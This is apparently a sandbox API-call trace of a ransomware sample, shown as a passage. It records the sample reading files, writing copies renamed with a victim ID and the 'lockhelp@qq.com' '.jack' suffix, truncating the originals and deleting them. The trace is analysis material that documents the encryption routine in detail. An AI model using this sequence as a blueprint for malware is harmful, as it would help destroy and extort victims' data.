lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0219.542] lstrlenW (lpString=".ppt") returned 4 [0219.542] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0219.543] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00174_.GIF") returned 68 [0219.543] lstrlenW (lpString=".zip") returned 4 [0219.543] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0219.543] lstrlenW (lpString=".rar") returned 4 [0219.543] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0219.543] lstrlenW (lpString=".bz2") returned 4 [0219.543] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0219.543] lstrlenW (lpString=".7z") returned 3 [0219.543] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0219.543] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00174_.GIF") returned 68 [0219.543] lstrlenW (lpString=".dbf") returned 4 [0219.543] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0219.543] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00174_.GIF") returned 68 [0219.543] lstrlenW (lpString=".1cd") returned 4 [0219.543] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0219.543] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00174_.GIF") returned 68 [0219.543] lstrlenW (lpString=".jpg") returned 4 [0219.543] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0219.543] lstrcmpiW (lpString1=".WMF", lpString2=".jack") returned 1 [0219.543] lstrlenW (lpString="AN00010_.WMF") returned 12 [0219.543] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00010_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00010_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0219.549] GetFileSizeEx (in: hFile=0x43c, lpFileSize=0x391ff14 | out: lpFileSize=0x391ff14*=3026) returned 1 [0219.549] CloseHandle (hObject=0x43c) returned 1 [0219.549] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00010_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00010_.wmf")) returned 0x220 [0219.549] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00010_.WMF.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00010_.wmf.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0219.550] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00010_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00010_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0219.550] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0219.550] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0219.550] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00010_.WMF.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00010_.wmf.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x454 [0219.551] GetLastError () returned 0x0 [0219.551] ReadFile (in: hFile=0x43c, lpBuffer=0x444e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x391fecc, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesRead=0x391fecc*=0xbd2, lpOverlapped=0x0) returned 1 [0219.892] WriteFile (in: hFile=0x454, lpBuffer=0x444e020*, nNumberOfBytesToWrite=0xbe0, lpNumberOfBytesWritten=0x391fc94, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesWritten=0x391fc94*=0xbe0, lpOverlapped=0x0) returned 1 [0219.893] ReadFile (in: hFile=0x43c, lpBuffer=0x444e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x391fecc, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesRead=0x391fecc*=0x0, lpOverlapped=0x0) returned 1 [0219.893] WriteFile (in: hFile=0x454, lpBuffer=0x444e020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x391fc94, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesWritten=0x391fc94*=0xec, lpOverlapped=0x0) returned 1 [0219.893] SetEndOfFile (hFile=0x454) returned 1 [0219.893] CloseHandle (hObject=0x454) returned 1 [0219.897] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0219.897] SetEndOfFile (hFile=0x43c) returned 1 [0219.898] CloseHandle (hObject=0x43c) returned 1 [0219.898] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00010_.WMF.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x220) returned 1 [0219.898] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00010_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00010_.wmf")) returned 1 [0219.898] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00010_.WMF") returned 68 [0219.898] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00010_.WMF") returned 68 [0219.898] lstrlenW (lpString=".doc") returned 4 [0219.898] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0219.898] lstrlenW (lpString=".docx") returned 5 [0219.898] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0219.898] lstrlenW (lpString=".pdf") returned 4 [0219.899] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0219.899] lstrlenW (lpString=".xls") returned 4 [0219.899] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0219.899] lstrlenW (lpString=".xlsx") returned 5 [0219.899] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0219.899] lstrlenW (lpString=".ppt") returned 4 [0219.899] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0219.899] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00010_.WMF") returned 68 [0219.899] lstrlenW (lpString=".zip") returned 4 [0219.899] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0219.899] lstrlenW (lpString=".rar") returned 4 [0219.899] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0219.899] lstrlenW (lpString=".bz2") returned 4 [0219.899] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0219.899] lstrlenW (lpString=".7z") returned 3 [0219.899] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0219.899] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00010_.WMF") returned 68 [0219.899] lstrlenW (lpString=".dbf") returned 4 [0219.899] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0219.899] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00010_.WMF") returned 68 [0219.899] lstrlenW (lpString=".1cd") returned 4 [0219.899] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0219.899] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00010_.WMF") returned 68 [0219.899] lstrlenW (lpString=".jpg") returned 4 [0219.899] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0219.899] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00010_.WMF") returned 68 [0219.899] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00010_.WMF") returned 68 [0219.899] lstrlenW (lpString=".doc") returned 4 [0219.899] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0219.899] lstrlenW (lpString=".docx") returned 5 [0219.899] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0219.899] lstrlenW (lpString=".pdf") returned 4 [0219.899] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0219.899] lstrlenW (lpString=".xls") returned 4 [0219.899] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0219.899] lstrlenW (lpString=".xlsx") returned 5 [0219.900] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0219.900] lstrlenW (lpString=".ppt") returned 4 [0219.900] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0219.900] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00010_.WMF") returned 68 [0219.900] lstrlenW (lpString=".zip") returned 4 [0219.900] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0219.900] lstrlenW (lpString=".rar") returned 4 [0219.900] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0219.900] lstrlenW (lpString=".bz2") returned 4 [0219.900] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0219.900] lstrlenW (lpString=".7z") returned 3 [0219.900] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0219.900] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00010_.WMF") returned 68 [0219.900] lstrlenW (lpString=".dbf") returned 4 [0219.900] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0219.900] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00010_.WMF") returned 68 [0219.900] lstrlenW (lpString=".1cd") returned 4 [0219.900] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0219.900] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00010_.WMF") returned 68 [0219.900] lstrlenW (lpString=".jpg") returned 4 [0219.900] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0219.900] lstrcmpiW (lpString1=".WMF", lpString2=".jack") returned 1 [0219.900] lstrlenW (lpString="AN01039_.WMF") returned 12 [0219.900] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01039_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01039_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0219.900] GetFileSizeEx (in: hFile=0x43c, lpFileSize=0x391ff14 | out: lpFileSize=0x391ff14*=3344) returned 1 [0219.901] CloseHandle (hObject=0x43c) returned 1 [0219.901] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01039_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01039_.wmf")) returned 0x220 [0219.901] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01039_.WMF.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01039_.wmf.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0219.901] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01039_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01039_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0219.901] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0219.901] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0219.901] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01039_.WMF.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01039_.wmf.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x454 [0219.901] GetLastError () returned 0x0 [0219.901] ReadFile (hFile=0x43c, lpBuffer=0x444e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x391fecc, lpOverlapped=0x0) Thread: id = 23 os_tid = 0xb64 [0195.737] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10000) returned 0x3fc1260 [0195.738] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10000) returned 0x3fd1268 [0195.738] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x2378aa0 [0195.738] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x6) returned 0x65aa40 [0195.738] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x2378b18 [0195.738] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x100000) returned 0x4555020 [0195.741] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x2378830 [0195.741] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x2378830, Size=0x20) returned 0x236baf8 [0195.741] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x2378830 [0195.741] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x2378830, Size=0x20) returned 0x236b8f0 [0195.742] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75e90000 [0195.742] GetProcAddress (hModule=0x75e90000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x75ea6b30 [0195.742] Wow64DisableWow64FsRedirection (in: OldValue=0x3a5ff50 | out: OldValue=0x3a5ff50*=0x0) returned 1 [0195.742] lstrlenW (lpString="kernel32.dll") returned 12 [0195.742] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x236baf8 | out: hHeap=0x5e0000) returned 1 [0195.742] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0195.742] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x236b8f0 | out: hHeap=0x5e0000) returned 1 [0195.742] Sleep (dwMilliseconds=0x64) [0195.927] lstrcmpiW (lpString1=".log", lpString2=".jack") returned 1 [0195.927] lstrlenW (lpString="oobe_2017_09_07_03_08_57_737.log") returned 32 [0195.927] CreateFileW (lpFileName="C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log" (normalized: "c:\\$getcurrent\\logs\\oobe_2017_09_07_03_08_57_737.log"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc [0196.129] GetFileSizeEx (in: hFile=0x3dc, lpFileSize=0x3a5ff14 | out: lpFileSize=0x3a5ff14*=6004) returned 1 [0196.129] CloseHandle (hObject=0x3dc) returned 1 [0196.129] GetFileAttributesW (lpFileName="C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log" (normalized: "c:\\$getcurrent\\logs\\oobe_2017_09_07_03_08_57_737.log")) returned 0x20 [0196.129] GetFileAttributesW (lpFileName="C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\$getcurrent\\logs\\oobe_2017_09_07_03_08_57_737.log.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0196.130] CreateFileW (lpFileName="C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log" (normalized: "c:\\$getcurrent\\logs\\oobe_2017_09_07_03_08_57_737.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc [0196.130] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.130] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.130] CreateFileW (lpFileName="C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\$getcurrent\\logs\\oobe_2017_09_07_03_08_57_737.log.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e0 [0196.130] GetLastError () returned 0x0 [0196.130] ReadFile (in: hFile=0x3dc, lpBuffer=0x4555020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fecc, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesRead=0x3a5fecc*=0x1774, lpOverlapped=0x0) returned 1 [0196.144] WriteFile (in: hFile=0x3e0, lpBuffer=0x4555020*, nNumberOfBytesToWrite=0x1780, lpNumberOfBytesWritten=0x3a5fc94, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesWritten=0x3a5fc94*=0x1780, lpOverlapped=0x0) returned 1 [0196.145] ReadFile (in: hFile=0x3dc, lpBuffer=0x4555020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fecc, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesRead=0x3a5fecc*=0x0, lpOverlapped=0x0) returned 1 [0196.145] WriteFile (in: hFile=0x3e0, lpBuffer=0x4555020*, nNumberOfBytesToWrite=0x114, lpNumberOfBytesWritten=0x3a5fc94, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesWritten=0x3a5fc94*=0x114, lpOverlapped=0x0) returned 1 [0196.145] SetEndOfFile (hFile=0x3e0) returned 1 [0196.145] CloseHandle (hObject=0x3e0) returned 1 [0196.149] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.149] SetEndOfFile (hFile=0x3dc) returned 1 [0196.150] CloseHandle (hObject=0x3dc) returned 1 [0196.150] SetFileAttributesW (lpFileName="C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x20) returned 1 [0196.151] DeleteFileW (lpFileName="C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log" (normalized: "c:\\$getcurrent\\logs\\oobe_2017_09_07_03_08_57_737.log")) returned 1 [0196.151] lstrlenW (lpString="C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log") returned 52 [0196.151] lstrlenW (lpString="C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log") returned 52 [0196.151] lstrlenW (lpString=".doc") returned 4 [0196.151] lstrcmpiW (lpString1=".doc", lpString2=".log") returned -1 [0196.151] lstrlenW (lpString=".docx") returned 5 [0196.151] lstrcmpiW (lpString1=".docx", lpString2="7.log") returned -1 [0196.151] lstrlenW (lpString=".pdf") returned 4 [0196.151] lstrcmpiW (lpString1=".pdf", lpString2=".log") returned 1 [0196.151] lstrlenW (lpString=".xls") returned 4 [0196.151] lstrcmpiW (lpString1=".xls", lpString2=".log") returned 1 [0196.152] lstrlenW (lpString=".xlsx") returned 5 [0196.152] lstrcmpiW (lpString1=".xlsx", lpString2="7.log") returned -1 [0196.152] lstrlenW (lpString=".ppt") returned 4 [0196.152] lstrcmpiW (lpString1=".ppt", lpString2=".log") returned 1 [0196.152] lstrlenW (lpString="C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log") returned 52 [0196.152] lstrlenW (lpString=".zip") returned 4 [0196.152] lstrcmpiW (lpString1=".zip", lpString2=".log") returned 1 [0196.152] lstrlenW (lpString=".rar") returned 4 [0196.152] lstrcmpiW (lpString1=".rar", lpString2=".log") returned 1 [0196.152] lstrlenW (lpString=".bz2") returned 4 [0196.152] lstrcmpiW (lpString1=".bz2", lpString2=".log") returned -1 [0196.152] lstrlenW (lpString=".7z") returned 3 [0196.152] lstrcmpiW (lpString1=".7z", lpString2="log") returned -1 [0196.152] lstrlenW (lpString="C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log") returned 52 [0196.152] lstrlenW (lpString=".dbf") returned 4 [0196.152] lstrcmpiW (lpString1=".dbf", lpString2=".log") returned -1 [0196.152] lstrlenW (lpString="C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log") returned 52 [0196.152] lstrlenW (lpString=".1cd") returned 4 [0196.152] lstrcmpiW (lpString1=".1cd", lpString2=".log") returned -1 [0196.152] lstrlenW (lpString="C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log") returned 52 [0196.152] lstrlenW (lpString=".jpg") returned 4 [0196.152] lstrcmpiW (lpString1=".jpg", lpString2=".log") returned -1 [0196.152] lstrlenW (lpString="C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log") returned 52 [0196.152] lstrlenW (lpString="C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log") returned 52 [0196.153] lstrlenW (lpString=".doc") returned 4 [0196.153] lstrcmpiW (lpString1=".doc", lpString2=".log") returned -1 [0196.153] lstrlenW (lpString=".docx") returned 5 [0196.153] lstrcmpiW (lpString1=".docx", lpString2="7.log") returned -1 [0196.153] lstrlenW (lpString=".pdf") returned 4 [0196.153] lstrcmpiW (lpString1=".pdf", lpString2=".log") returned 1 [0196.153] lstrlenW (lpString=".xls") returned 4 [0196.153] lstrcmpiW (lpString1=".xls", lpString2=".log") returned 1 [0196.153] lstrlenW (lpString=".xlsx") returned 5 [0196.153] lstrcmpiW (lpString1=".xlsx", lpString2="7.log") returned -1 [0196.153] lstrlenW (lpString=".ppt") returned 4 [0196.153] lstrcmpiW (lpString1=".ppt", lpString2=".log") returned 1 [0196.153] lstrlenW (lpString="C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log") returned 52 [0196.153] lstrlenW (lpString=".zip") returned 4 [0196.153] lstrcmpiW (lpString1=".zip", lpString2=".log") returned 1 [0196.153] lstrlenW (lpString=".rar") returned 4 [0196.153] lstrcmpiW (lpString1=".rar", lpString2=".log") returned 1 [0196.153] lstrlenW (lpString=".bz2") returned 4 [0196.153] lstrcmpiW (lpString1=".bz2", lpString2=".log") returned -1 [0196.153] lstrlenW (lpString=".7z") returned 3 [0196.153] lstrcmpiW (lpString1=".7z", lpString2="log") returned -1 [0196.153] lstrlenW (lpString="C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log") returned 52 [0196.153] lstrlenW (lpString=".dbf") returned 4 [0196.153] lstrcmpiW (lpString1=".dbf", lpString2=".log") returned -1 [0196.153] lstrlenW (lpString="C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log") returned 52 [0196.154] lstrlenW (lpString=".1cd") returned 4 [0196.154] lstrcmpiW (lpString1=".1cd", lpString2=".log") returned -1 [0196.154] lstrlenW (lpString="C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log") returned 52 [0196.154] lstrlenW (lpString=".jpg") returned 4 [0196.154] lstrcmpiW (lpString1=".jpg", lpString2=".log") returned -1 [0196.154] lstrcmpiW (lpString1=".ini", lpString2=".jack") returned -1 [0196.154] lstrlenW (lpString="desktop.ini") returned 11 [0196.154] CreateFileW (lpFileName="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc [0196.154] GetFileSizeEx (in: hFile=0x3dc, lpFileSize=0x3a5ff14 | out: lpFileSize=0x3a5ff14*=129) returned 1 [0196.154] CloseHandle (hObject=0x3dc) returned 1 [0196.154] GetFileAttributesW (lpFileName="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini")) returned 0x26 [0196.154] GetFileAttributesW (lpFileName="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\$recycle.bin\\s-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0196.155] CreateFileW (lpFileName="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc [0196.155] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.155] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.155] CreateFileW (lpFileName="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\$recycle.bin\\s-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e0 [0196.155] GetLastError () returned 0x0 [0196.155] ReadFile (in: hFile=0x3dc, lpBuffer=0x4555020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fecc, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesRead=0x3a5fecc*=0x81, lpOverlapped=0x0) returned 1 [0196.155] WriteFile (in: hFile=0x3e0, lpBuffer=0x4555020*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x3a5fc94, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesWritten=0x3a5fc94*=0x90, lpOverlapped=0x0) returned 1 [0196.156] ReadFile (in: hFile=0x3dc, lpBuffer=0x4555020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fecc, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesRead=0x3a5fecc*=0x0, lpOverlapped=0x0) returned 1 [0196.156] WriteFile (in: hFile=0x3e0, lpBuffer=0x4555020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x3a5fc94, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesWritten=0x3a5fc94*=0xea, lpOverlapped=0x0) returned 1 [0196.156] SetEndOfFile (hFile=0x3e0) returned 1 [0196.156] CloseHandle (hObject=0x3e0) returned 1 [0196.157] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.157] SetEndOfFile 